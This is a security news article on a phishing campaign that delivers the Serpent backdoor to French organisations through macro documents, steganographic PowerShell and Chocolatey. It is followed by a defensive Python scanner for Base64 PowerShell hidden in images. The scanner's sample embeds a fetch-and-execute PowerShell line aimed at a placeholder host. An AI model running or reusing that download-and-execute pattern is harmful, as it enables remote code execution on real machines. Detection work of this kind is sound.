New Backdoor Targets French Entities via Open-Source Package Installer

Researchers have exposed a new targeted email campaign aimed at French entities in the construction, real estate, and government sectors that leverages the Chocolatey Windows package manager to deliver a backdoor called Serpent on compromised systems.

Enterprise security firm Proofpoint attributed the attacks to a likely advanced threat actor based on the tactics and the victimology patterns observed. The ultimate objective of the campaign remains presently unknown.

“The threat actor attempted to install a backdoor on a potential victim’s device, which could enable remote administration, command, and control (C2), data theft, or deliver other additional payloads,” Proofpoint researchers said in a report shared with The Hacker News.

The phishing lure that triggers the infection sequence makes use of a resume-themed subject line, with the attached macro-embedded Microsoft Word document masquerading as information related to the European Union’s General Data Protection Regulation (GDPR).

Enabling the macros triggers their execution, which retrieves a seemingly harmless image file hosted on a remote server. The image actually contains a Base64-encoded PowerShell script that is hidden using steganography, a little-used method of concealing malicious code within an image or audio file in order to evade detection.
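As an added defender-side illustration (not code from the article, from Proofpoint, or from the campaign), the following Python scans an image for a Base64 run that decodes to PowerShell and reports any bytes appended after the PNG IEND chunk. The sample image and the placeholder script it hides are constructed here, and the indicator list is an assumption.

```python
import base64
import re

# Substrings a defender would treat as PowerShell indicators in decoded
# text (assumed list for this example, not from the article).
PS_INDICATORS = ("Invoke-Expression", "IEX", "DownloadString",
                 "FromBase64String", "New-Object", "-EncodedCommand")
# Runs of Base64 alphabet long enough to be a script rather than noise.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")

PNG_SIG = b"\x89PNG\r\n\x1a\n"
PNG_IEND = b"\x00\x00\x00\x00IEND\xaeB`\x82"

# Constructed sample: minimal PNG framing with a Base64 blob appended
# after IEND. The script text is a placeholder, not the campaign's payload.
PLACEHOLDER_SCRIPT = ("Invoke-Expression (New-Object Net.WebClient)"
                      ".DownloadString('http://placeholder.invalid/')")
SAMPLE_IMAGE = (PNG_SIG + b"\x00" * 64 + PNG_IEND
                + base64.b64encode(PLACEHOLDER_SCRIPT.encode()))


def trailing_bytes_after_iend(blob: bytes) -> int:
    """Bytes present after the PNG IEND chunk (0 if none or not a PNG)."""
    if not blob.startswith(PNG_SIG):
        return 0
    end = blob.find(PNG_IEND)
    return 0 if end < 0 else len(blob) - end - len(PNG_IEND)


def find_embedded_powershell(blob: bytes):
    """Return (offset, decoded_text) for Base64 runs whose decoded text
    holds a PowerShell indicator; UTF-8 and UTF-16LE are both tried,
    the latter being what -EncodedCommand expects."""
    hits = []
    for m in B64_RUN.finditer(blob):
        chunk = m.group(0)
        chunk += b"=" * (-len(chunk) % 4)  # repair stripped padding
        try:
            decoded = base64.b64decode(chunk, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        for enc in ("utf-8", "utf-16-le"):
            try:
                text = decoded.decode(enc)
            except UnicodeDecodeError:
                continue
            if any(ind.lower() in text.lower() for ind in PS_INDICATORS):
                hits.append((m.start(), text))
                break
    return hits
```

Run the two checks together: a non-zero trailing byte count plus a decoded PowerShell hit is a much stronger signal than either alone, since many legitimate files carry harmless data after IEND.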
